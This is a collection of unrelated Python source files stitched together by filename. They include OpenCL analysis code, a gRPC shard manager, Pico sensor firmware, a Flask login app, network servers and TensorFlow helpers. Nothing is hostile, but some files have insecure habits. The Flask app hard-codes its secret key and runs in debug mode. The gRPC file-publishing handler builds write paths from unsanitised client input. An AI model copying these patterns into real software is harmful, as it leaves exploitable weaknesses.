is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
white_vertical_frequency_distribution_buffer,
white_vertical_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
white_vertical_carryover_buffer,
self.white_vertical_length_carryover[white_vertical_carryover_start:white_vertical_carryover_end],
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
diagonal_frequency_distribution_buffer,
diagonal_frequency_distribution,
device_offset=0,
wait_for=None,
is_blocking=False))
transfer_from_device_events.append(cl.enqueue_read_buffer(command_queue,
diagonal_carryover_buffer,
self.diagonal_length_carryover[diagonal_carryover_start:diagonal_carryover_end],
device_offset=0,
wait_for=None,
is_blocking=False))
command_queue.finish()
# Update frequency distributions
self.threads_vertical_frequency_distribution[device] += vertical_frequency_distribution
self.threads_white_vertical_frequency_distribution[device] += white_vertical_frequency_distribution
self.threads_diagonal_frequency_distribution[device] += diagonal_frequency_distribution
# Get events runtimes
runtimes = Runtimes()
runtimes.transfer_to_device = self.opencl.convert_events_runtime(transfer_to_device_events)
runtimes.transfer_from_device = self.opencl.convert_events_runtime(transfer_from_device_events)
runtimes.create_matrix = self.opencl.convert_events_runtime(create_matrix_events)
runtimes.detect_vertical_lines = self.opencl.convert_events_runtime(vertical_events)
runtimes.detect_diagonal_lines = self.opencl.convert_events_runtime(diagonal_events)
self.threads_runtimes[device] += runtimes
except Queue.Empty:
break
def run_single_device(self):
for sub_matrix_queue in self.sub_matrix_queues:
self.process_sub_matrix(device=self.opencl.devices[0],
sub_matrix_queue=sub_matrix_queue)
def run_multiple_devices(self):
for sub_matrix_queue in self.sub_matrix_queues:
threads = []
for device in self.opencl.devices:
kwargs = {'device': device,
'sub_matrix_queue': sub_matrix_queue}
thread = threading.Thread(group=None, target=self.process_sub_matrix, name=None, args=(), kwargs=kwargs)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def run(self):
self.reset()
runtimes = Runtimes()
if len(self.opencl.devices) == 0:
print 'No device specified!'
return 0
elif len(self.opencl.devices) == 1:
self.run_single_device()
elif len(self.opencl.devices) > 1:
self.run_multiple_devices()
self.post_process_length_carryovers()
for device in self.opencl.devices:
runtimes += self.threads_runtimes[device]
self.diagonal_frequency_distribution += self.threads_diagonal_frequency_distribution[device]
self.vertical_frequency_distribution += self.threads_vertical_frequency_distribution[device]
self.white_vertical_frequency_distribution += self.threads_white_vertical_frequency_distribution[device]
if self.settings.is_matrix_symmetric:
self.extent_diagonal_frequency_distribution()
result = RQAResult(self.settings,
runtimes,
recurrence_points=self.recurrence_points,
diagonal_frequency_distribution=self.diagonal_frequency_distribution,
vertical_frequency_distribution=self.vertical_frequency_distribution,
white_vertical_frequency_distribution=self.white_vertical_frequency_distribution)
return result
|
test_uvicorn_int.py
|
import os
from multiprocessing import Process
from time import sleep
from urllib.parse import urljoin
import pytest
import requests
import uvicorn
from server import app
class ClientSession(requests.Session):
def __init__(self, base_url):
self.base_url = base_url
super().__init__()
def request(self, method, url, *args, **kwargs):
return super().request(method, urljoin(self.base_url, url), *args, **kwargs)
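# A small illustrative use of this session wrapper (values are the ones defined
# below in this test module): ClientSession("http://127.0.0.1:44555").get("/api/todos/1")
# issues a GET against http://127.0.0.1:44555/api/todos/1.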
def get_sleep_time():
# when starting a server process,
# a longer sleep time is necessary on Windows
if os.name == "nt":
return 1.5
return 0.5
server_host = "127.0.0.1"
server_port = 44555
@pytest.fixture(scope="session")
def client_session():
return ClientSession(f"http://{server_host}:{server_port}")
def _start_server():
uvicorn.run(app, host=server_host, port=server_port, log_level="debug")
@pytest.fixture(scope="session", autouse=True)
def server():
server_process = Process(target=_start_server)
server_process.start()
sleep(get_sleep_time())
if not server_process.is_alive():
        raise RuntimeError("The server process did not start!")
yield 1
sleep(1.2)
server_process.terminate()
@pytest.mark.asyncio
async def test_get(client_session):
response = client_session.get("/api/todos/1")
assert response.status_code == 200
|
manager_server.py
|
import os
from datetime import datetime, timedelta
from concurrent.futures import ThreadPoolExecutor
import threading
import time
from lib.config import logger, domain_name
from lib.hoar_frost import HoarFrostGenerator
import grpc
import lib.ipc.manager_pb2_grpc as manager_grpc
import lib.ipc.manager_pb2 as message
from lib.ipc.grpc_client import grpc_options
class Manager(manager_grpc.ManagerServicer):
"""
Implements a server for the Manager gRPC protocol.
"""
def __init__(self, total_shards):
"""
Instantiates a new manager server that handles some
number of shards.
"""
logger.info(f"Number of shards: {total_shards}")
self.hoarfrost_gen = HoarFrostGenerator()
self.total_shards = total_shards
self.registered = [False for _ in range(total_shards)]
self.last_checkin = dict()
self.store = dict()
def health_check(self):
while True:
time.sleep(5)
for shard, last_checkin in self.last_checkin.items():
if last_checkin is not None and last_checkin < datetime.now() - timedelta(seconds=5):
logger.error(f"--- SHARD {shard} MISSED ITS HEARTBEAT, DEREGISTERING... ---")
self.registered[shard] = False
self.last_checkin[shard] = None
def register(self, request, context):
"""Returns the next shard id that needs to be filled as well as the total shards"""
if all(self.registered):
raise Exception("Shard trying to register even though we're full")
i = next(i for i in range(self.total_shards) if not self.registered[i])
logger.info(f"Shard requested id, assigning {i + 1}/{self.total_shards}...")
self.registered[i] = True
return message.ShardInfo(shard_id=i, shard_count=self.total_shards)
def guild_count(self, request, context):
"""Return guild and user count information"""
gc = 0
uc = 0
for guilds in self.store.values():
gc += len(guilds)
for guild in guilds:
uc += guild.member_count
return message.GuildInfo(guild_count=gc, user_count=uc)
def checkin(self, request, context):
self.last_checkin[request.shard_id] = datetime.now()
self.registered[request.shard_id] = True
return message.CheckInResponse()
def publish_file(self, request_iterator, context):
"""Missing associated documentation comment in .proto file"""
first = next(request_iterator)
filetype = "png" if first.filetype == "" else first.filetype
name = first.name
if name == "":
name = str(self.hoarfrost_gen.generate())
location = first.location
if location == "":
location = "assets"
directory = f"/var/www/{location}"
if not os.path.exists(directory):
os.makedirs(directory)
with open(f"{directory}/{name}.{filetype}", "wb") as f:
logger.info(f"Writing {directory}/{name}.{filetype}")
f.write(first.file)
for datum in request_iterator:
f.write(datum.file)
return message.Url(url=f"https://cdn.{domain_name}/{location}/{name}.{filetype}")
def all_guilds(self, request, context):
"""Return information about all guilds that the bot is in, including their admins"""
for guilds in self.store.values():
for guild in guilds:
yield guild
def guild_update(self, request_iterator, context):
"""Update the manager with the latest information about a shard's guilds"""
guilds = []
for guild in request_iterator:
guilds.append(guild)
if len(guilds) == 0:
return message.UpdateResponse()
logger.debug(f"Received guild list from shard {guilds[0].shard_id + 1} of {len(guilds)} guilds")
self.store[guilds[0].shard_id] = guilds
return message.UpdateResponse()
def serve(manager):
server = grpc.server(ThreadPoolExecutor(max_workers=20), options=grpc_options)
manager_grpc.add_ManagerServicer_to_server(manager, server)
server.add_insecure_port("0.0.0.0:50051")
server.start()
logger.debug("gRPC server started")
server.wait_for_termination()
if __name__ == "__main__":
manager = Manager(int(os.environ["NUM_SHARDS"]))
health = threading.Thread(target=manager.health_check, daemon=True)
health.start()
serve(manager)
|
driver.py
|
# Firmware for hall-sensor based filament diameter sensors.
# Reads analog value from the sensor and provides a mapped and filtered diameter
# reading over I2C (optional analog output)
# Runs on Raspberry Pi Pico ($4)
# Licensed CC-0 / Public Domain by John Moser
#
# Threads and power usage:
# - Main loop: block on i2c
# - LED: sleep_ms() or block on q.get()
# - sensor: sleep_us(1); might be able to reduce this to event-driven
from machine import Pin, ADC, I2C
from utime import sleep_ms, sleep_us
import os
import ujson
from numpy.polynomial.polynomial import Polynomial
from numpy import mean
from queue import Queue
from threading import Thread
#import _thread
# LED states
LED_START = 1
LED_THINKING = 2
LED_COMPLETE = 3
LED_FAULT = 4
def main():
sensor_queue = Queue()
reading_queue = Queue()
reading_response = Queue()
(i2c,led,led_queue,hall_sensor,calibration_table,curve) = init()
    t_sensor = Thread(target=sensor_task,
                      args=(hall_sensor, reading_queue, reading_response))
    t_sensor.start()
    while True:
pass
# TODO:
# - block and wait for i2c command (i2c.recv(???))
# - when i2c requests diameter:
# reading_queue.put(1)
# i2c.send(get_diameter(reading_response.get(), curve))
#
# - when i2c signals calibrate <diameter>,
# take a reading into the calibration table
def init():
u"""Initialize the board to a known state."""
calibration_path = "/diameter-calibration-table.json"
# Onboard LED, for feedback
    led = Pin(25, Pin.OUT)
led_queue = Queue()
    t_led = Thread(target=led_task, args=(led, led_queue))
    t_led.start()
# Signal bootup
led_queue.put(LED_START)
led_queue.put(LED_THINKING)
# I2C0 using pins 0 and 1. Address is 43
# FIXME: Make address configurable
    i2c = I2C(0, sda=Pin(0), scl=Pin(1), freq=400000)
i2c.init(I2C.SLAVE, addr=43)
# ADC 0 on GP27, adjacent to AGND
    hall_sensor = ADC(27)
# Load calibration table
calibration_table = load_calibration_table(calibration_path)
curve = get_calibration_polynomial(calibration_table)
led_queue.put(LED_COMPLETE)
# send all the initialized stuff back
return (i2c, led, led_queue, hall_sensor, calibration_table, curve)
def led_task(led, q):
    u"""Drive the onboard LED according to the state codes received on q."""
    counter = 0
    c = 0
    while True:
        # Certain actions loop until interrupted
        if c in [LED_THINKING, LED_COMPLETE, LED_FAULT]:
            if not q.empty(): c = q.get()
        else:
            c = q.get()
        if c == LED_START:
            # Definitely set the state to on, then off
            led.on()
            sleep_ms(1000)
            led.off()
        elif c == LED_THINKING:
            led.toggle()
            sleep_ms(500)
        elif c == LED_COMPLETE:
            # Toggle every 1/8 seconds for 1 second
            counter = 8 if counter == 0 else counter - 1
            led.toggle()
            sleep_ms(125)
            if counter == 0:
                led.off()
                c = 0  # Clear c
        elif c == LED_FAULT:
            led.toggle()
            sleep_ms(1000)
def sensor_task(hall_sensor, q, qo):
ma_length = 50 # Number of elements in moving average
readings = []
# Repeatedly take readings for a simple moving average
# XXX: Does a 50µs delay matter? If not, block on q.get(),
# and then set a counter and loop to get the 50 readings.
# This reduces power usage.
while True:
readings.append(hall_sensor.read_u16())
        if len(readings) > ma_length: readings.pop(0)
sleep_us(1)
# If there's anything in q, send a reading to qo
try:
q.get(block=False)
qo.put(mean(readings))
except:
pass
# The strength of a magnetic field is inversely proportional to the square of the
# distance between the sensor and the magnet:
#
# f(d) = a*d**2 + b*d + c
#
# Smaller d values lead to larger f(d) values; thus the domain is the set of d
# values greater than zero, left of the vertex, with f(d) >= 0.
#
# The calibration output is the polynomial, and it is solved for d (diameter) given a
# value of y (Hall Sensor reading).
def get_diameter(reading, curve):
    u"""Retrieve the diameter reading from the Hall Sensor."""
    # Subtract the reading from the polynomial's constant term, then find the
    # roots; the smallest root is the diameter.  Work on a copy so the
    # calibration curve is not mutated between calls.
    return min((curve - reading).roots())
###############
# Calibration #
###############
# Calibration works as follows:
#
# - A json file contains { 'calibration': [ {'reading': HALL_READING, 'diameter': IN_MM}, ... ]}
# - Calibration is read in from this file
# - A certain M-code on the host (M407 D<width>) triggers a sample reading, which
#   adds the Hall reading and the diameter to the 'calibration' key
# - A certain M-code (M407 D<width> S<reading>) provides a diameter and reading
# - Upon loading or updating the calibration info, a quadratic polynomial is fit to the
#   data; an illustrative sample of the file is shown below
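#
# A purely illustrative example of the calibration file's contents (these
# readings and diameters are made-up values, not real calibration data):
#
#   {"calibration": [{"reading": 61000, "diameter": 1.60},
#                    {"reading": 54000, "diameter": 1.75},
#                    {"reading": 47000, "diameter": 1.90}]}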
def calibrate(sensor, sample_diameter):
u"""Adds a sample diameter to the calibration table."""
# Unnecessary? Migrate into a bigger function?
return {'reading': sensor.read_u16(), 'diameter': sample_diameter}
def get_calibration_polynomial(calibration_table):
u"""From calibration points, computes a best-fit quadratic equation."""
return Polynomial.fit(
[x['reading'] for x in calibration_table['calibration']],
[y['diameter'] for y in calibration_table['calibration']],
2)
#
# Because the Hall Effect sensor reading decreases with greater distance,
# the smaller value of regression.roots() is the maximum distance sensed,
# and all diameters sought are less than this.
#
# However, if the sensor never reads 0, then it will be everything to the
# left of the vertex. This is likely the better approach; it's just
# setting the upper bound for diameter.
def load_calibration_table(path):
    u"""Open a calibration table from a file."""
    try:
        # Don't load if the file is like, way big d00d
        if os.stat(path)[6] > 5120: raise ImportError
        with open(path, 'r') as f:
            table = ujson.load(f)
    except:
        table = {}
    return table
if __name__ == "__main__":
main()
|
test_gpsdclient.py
|
import socket
import threading
import time
from collections import Counter
from gpsdclient import GPSDClient
from .gpsd_fake import GPSD_OUTPUT, VERSION_HEADER, fake_gpsd_server
socket.setdefaulttimeout(10)
def start_fake_server():
server = threading.Thread(target=fake_gpsd_server)
server.start()
time.sleep(1.0)
while not server.is_alive():
time.sleep(0.1)
def test_json_stream():
expected = (VERSION_HEADER.decode("utf-8") + GPSD_OUTPUT).replace("\n\n", "\n")
start_fake_server()
client = GPSDClient()
output = ""
for row in client.json_stream():
output += row + "\n"
assert output == expected
def test_dict_stream():
start_fake_server()
client = GPSDClient()
count = 0
for row in client.dict_stream():
if row["class"] == "TPV":
count += 1
assert count == 3
def test_dict_filter():
start_fake_server()
client = GPSDClient()
counter = Counter()
for row in client.dict_stream(filter=["SKY"]):
counter[row["class"]] += 1
assert counter["TPV"] == 0
assert counter["SKY"] == 3
start_fake_server()
client = GPSDClient()
counter = Counter()
for row in client.dict_stream(filter=["SKY", "TPV"]):
counter[row["class"]] += 1
assert counter["TPV"] == 3
assert counter["SKY"] == 3
|
app.py
|
from flask import Flask, render_template, request, redirect, url_for, flash
##########################
#### importing flask extensions ####
##########################
from flask_login import LoginManager, login_user, current_user, login_required, logout_user
from flask_mail import Mail, Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
from sqlalchemy.ext.hybrid import hybrid_method, hybrid_property
from flask_bcrypt import Bcrypt
from datetime import datetime
from forms import RegisterForm, LoginForm
#create the object of Flask
app = Flask(__name__)
##########################
#### flask app configurations ####
##########################
app.config['SECRET_KEY'] = 'hardsecretkey'
#SqlAlchemy Database Configuration With Mysql
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:''@localhost/flasklogin'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
#Email related Configuration values
app.config['MAIL_SERVER'] = 'smtp.googlemail.com'
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = 'youraccount@gmail.com'
app.config['MAIL_PASSWORD'] = '@yourgmailpassword'
app.config['MAIL_DEFAULT_SENDER'] = 'youraccount@gmail.com'
##########################
#### initialising flask extensions ####
##########################
db = SQLAlchemy(app)
mail = Mail(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
##########################
#### defining user model and its helper functions using sqlalchemy ####
##########################
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
_password = db.Column(db.String(60), nullable=False)
authenticated = db.Column(db.Boolean, default=False)
email_confirmation_sent_on = db.Column(db.DateTime, nullable=True)
email_confirmed = db.Column(db.Boolean, nullable=True, default=False)
email_confirmed_on = db.Column(db.DateTime, nullable=True)
def __init__(self, email,username, plaintext_password, email_confirmation_sent_on=None):
self.email = email
self.username = username
self._password = plaintext_password
self.authenticated = False
self.email_confirmation_sent_on = email_confirmation_sent_on
self.email_confirmed = False
self.email_confirmed_on = None
@hybrid_property
def password(self):
return self._password
@hybrid_method
def verify_original_pass(self, plaintext_password):
return bcrypt.check_password_hash(self._password, plaintext_password)
@property
def is_authenticated(self):
"""Return True if the user is authenticated."""
return self.authenticated
@property
def is_active(self):
"""Always True, as all users are active."""
return True
# @property
# def is_anonymous(self):
# """Always False, as anonymous users aren't supported."""
# return False
def get_id(self):
"""Return the email address to satisfy Flask-Login's requirements."""
"""Requires use of Python 3"""
return str(self.id)
##########################
####mail sending,confirmation and password hashing helper functions ####
##########################
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, html_body):
msg = Message(subject, recipients=recipients)
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for(
'confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
html = render_template(
'email_confirmation.html',
confirm_url=confirm_url)
send_email('Confirm Your Email Address', [user_email], html)
@login_manager.user_loader
def load_user(user_id):
return User.query.filter(User.id == int(user_id)).first()
################
#### routes ####
################
@app.route('/')
def home():
form = LoginForm(request.form)
return render_template('login.html', form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
email = form.email.data
username = form.username.data
password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
new_user = User(email, username, password)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
send_confirmation_email(new_user.email)
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect(url_for('login'))
except IntegrityError:
db.session.rollback()
flash('ERROR! Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('register.html', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
            if user is not None and not user.email_confirmed:
                flash('Your account is not activated! Please open your email inbox and click the activation link we sent to activate it.', 'info')
elif user is not None and user.verify_original_pass(form.password.data):
user.authenticated = True
db.session.add(user)
db.session.commit()
login_user(user)
flash('You are logged in now, {}'.format(current_user.username))
return redirect(url_for('blog'))
else:
flash('ERROR! Incorrect login credentials.', 'error')
return render_template('login.html', form=form)
# email confirmation and activation route functions
@app.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=86400)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!', 'success')
return redirect(url_for('blog'))
@app.route('/blog')
@login_required
def blog():
return render_template('blog.html')
@app.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
    flash('You are logged out, we hope you come back soon!', 'info')
return redirect(url_for('login'))
#run flask app
if __name__ == "__main__":
app.run(debug=True)
|
mod.py
|
#!/usr/bin/env python
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
import os
import queue
import sys
import threading
# For json-encoded lines of text sent to the mod
QUEUE = queue.Queue()
CACHE = {"line": "no game data yet"}
def log(message):
f = open(os.path.expanduser("~/mod.log"), "a+")
f.write(message + "\n")
f.close()
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
content_length = int(self.headers["Content-Length"])
command = self.rfile.read(content_length).decode().strip()
# Clear the queue
while not QUEUE.empty():
try:
QUEUE.get_nowait()
except:
pass
# log("command: " + command)
print(command, flush=True)
try:
line = QUEUE.get(block=True, timeout=10.0)
except:
line = json.dumps({"error": "mod saw no response from game"})
# log("responding with: " + line)
self.send_response(200)
self.end_headers()
self.wfile.write(line.encode())
def server():
port = 7777
httpd = HTTPServer(("", port), Handler)
httpd.serve_forever()
def game_communicator():
log("ready")
print("ready", flush=True)
for line in sys.stdin:
QUEUE.put(line)
CACHE["line"] = line
if __name__ == "__main__":
t1 = threading.Thread(target=server)
t1.start()
t2 = threading.Thread(target=game_communicator)
t2.start()
# We should exit when the game exits. The server thread never exits on its own
t2.join()
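
# A minimal sketch of a client for this bridge (port 7777 is hard-coded above).
# The payload shown is hypothetical; the mod simply forwards whatever text it
# receives to the game and returns the game's JSON reply (or an error object
# after the 10 second timeout):
#
#   import requests
#   reply = requests.post("http://localhost:7777", data="status", timeout=15)
#   print(reply.text)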
|
server.py
|
"""
This file takes part of the server side of the peer to peer network
This file deals with uploading of the song for other peers
"""
import socket
import sys
import threading

from server_client.constants import *
class Server:
def __init__(self,msg):
try:
# the message to upload in bytes
self.msg = msg
# set up the socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# connections
self.connections = []
# make a list of peers
self.peers = []
# bind the socket
self.s.bind((HOST, PORT))
# server is listening for any connections
self.s.listen(1)
print("=" * 10 + "Server Running"+ "=" *10)
self.run()
except Exception as e:
sys.exit()
"""
This method deals with sending info to the clients
This methods also closes the connection if the client has left
:param: connection -> The connection server is connected to
:param: a -> (ip address, port) of the system connected
"""
def handler(self, connection, a):
try:
while True:
            # server receives the message
data = connection.recv(BYTE_SIZE)
for connection in self.connections:
# The peer that is connected wants to disconnect
if data and data.decode('utf-8')[0].lower() == 'q':
# disconnect the peer
self.disconnect(connection, a)
return
elif data and data.decode('utf-8') == REQUEST_STRING:
print("-" * 21 + " UPLOADING " + "-" * 21)
# if the connection is still active we send it back the data
# this part deals with uploading of the file
connection.send(self.msg)
#convert_to_music(self.msg)
except Exception as e:
sys.exit()
"""
    This method is run when the user disconnects
"""
def disconnect(self, connection, a):
self.connections.remove(connection)
self.peers.remove(a)
connection.close()
self.send_peers()
print("{}, disconnected".format(a))
print("-" * 50)
"""
    This method is used to run the server
This method creates a different thread for each client
"""
def run(self):
# This will make the server constantly look for any new connections
while True:
# listens
connection, a = self.s.accept()
# append to the list of peers
self.peers.append(a)
print("Peers are: {}".format(self.peers) )
self.send_peers()
# this will create a thread for a connection
c_thread = threading.Thread(target=self.handler, args=(connection, a))
c_thread.daemon = True
c_thread.start()
self.connections.append(connection)
print("{}, connected".format(a))
print("-" * 50)
"""
send a list of peers to all the peers that are connected to the server
"""
def send_peers(self):
peer_list = ""
for peer in self.peers:
peer_list = peer_list + str(peer[0]) + ","
for connection in self.connections:
            # we add the byte '\x11' at the beginning of our payload
            # This way we can differentiate if we received a message or a list of peers
            data = PEER_BYTE_DIFFERENTIATOR + bytes(peer_list, 'utf-8')
            connection.send(data)
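
# A minimal sketch of how a receiving peer might tell a peer list apart from
# song data, assuming PEER_BYTE_DIFFERENTIATOR is the b'\x11' marker described
# above (the surrounding names here are hypothetical):
#
#   data = connection.recv(BYTE_SIZE)
#   if data.startswith(PEER_BYTE_DIFFERENTIATOR):
#       peers = data[len(PEER_BYTE_DIFFERENTIATOR):].decode('utf-8').rstrip(',').split(',')
#   else:
#       pass  # treat the bytes as part of the uploaded song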
|
tcp_client.py
|
# Copyright (c) 2017, 2018 Jae-jun Kang
# See the file LICENSE for details.
import asyncore
import errno
import socket
from threading import Thread
from x2py.util.trace import Trace
from x2py.links.client_link import ClientLink
from x2py.links.asyncore.tcp_session import TcpSession
class TcpClient(ClientLink):
"""TCP/IP client link based on the asyncore module."""
class Dispatcher(asyncore.dispatcher):
def __init__(self, owner):
asyncore.dispatcher.__init__(self, map=owner.map)
self.owner = owner
def handle_connect(self):
self.owner.handle_connect()
def handle_close(self):
self.owner.handle_close()
def handle_error(self):
self.owner.handle_error()
def __init__(self, name):
super(TcpClient, self).__init__(name)
self.map = {}
self.dispatcher = TcpClient.Dispatcher(self)
self.thread = Thread(target=self._loop)
self.session = None
self.remote_host = ''
self.remote_port = 0
self.connecting = False
def cleanup(self):
asyncore.close_all(map=self.map)
self.thread.join()
super(TcpClient, self).cleanup()
def connect(self, host, port):
self.connecting = True
self.remote_host = host
self.remote_port = port
Trace.info("connecting to {}:{}", host, port)
self.dispatcher.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.dispatcher.connect((host, port))
self.thread.start()
def handle_connect(self):
        self.session = TcpSession(self, self.dispatcher.socket)
        self.session.connection_made()
def handle_close(self):
self.handle_error()
self.dispatcher.close()
def handle_error(self):
err = self.dispatcher.socket.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
if self.connecting:
Trace.error("connect error {}", errno.errorcode[err])
self.connecting = False
return
Trace.error("error {}", errno.errorcode[err])
def _loop(self):
asyncore.loop(map=self.map)
def _on_connect(self, result, context):
super(TcpClient, self)._on_connect(result, context)
if result:
peername = context.socket.getpeername()
Trace.info("connected to {}:{}", peername[0], peername[1])
context.peername = peername
else:
Trace.error("error connecting to {}:{}", self.remote_host, self.remote_port)
def _on_disconnect(self, handle, context):
super(TcpClient, self)._on_disconnect(handle, context)
peername = context.peername
Trace.info("disconnected from {}:{}", peername[0], peername[1])
|
conftest.py
|
import asyncio
import logging
import os
import pprint
from subprocess import PIPE, run
from threading import Thread
import pytest
from pygls import features
from pygls.server import LanguageServer
from cmake_language_server.server import CMakeLanguageServer
@pytest.fixture()
def cmake_build(shared_datadir):
source = shared_datadir / "cmake"
build = source / "build"
build.mkdir()
p = run(
["cmake", str(source)],
cwd=build,
stdout=PIPE,
stderr=PIPE,
universal_newlines=True,
)
if p.returncode != 0:
logging.error("env:\n" + pprint.pformat(os.environ))
logging.error("stdout:\n" + p.stdout)
logging.error("stderr:\n" + p.stderr)
raise RuntimeError("CMake failed")
yield build
@pytest.fixture()
def client_server():
c2s_r, c2s_w = os.pipe()
s2c_r, s2c_w = os.pipe()
def start(ls: LanguageServer, fdr, fdw):
# TODO: better patch is needed
# disable `close()` to avoid error messages
close = ls.loop.close
ls.loop.close = lambda: None
ls.start_io(os.fdopen(fdr, "rb"), os.fdopen(fdw, "wb"))
ls.loop.close = close
server = CMakeLanguageServer(asyncio.new_event_loop())
server_thread = Thread(target=start, args=(server, c2s_r, s2c_w))
server_thread.start()
client = LanguageServer(asyncio.new_event_loop())
client_thread = Thread(target=start, args=(client, s2c_r, c2s_w))
client_thread.start()
yield client, server
client.send_notification(features.EXIT)
server.send_notification(features.EXIT)
server_thread.join()
client_thread.join()
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
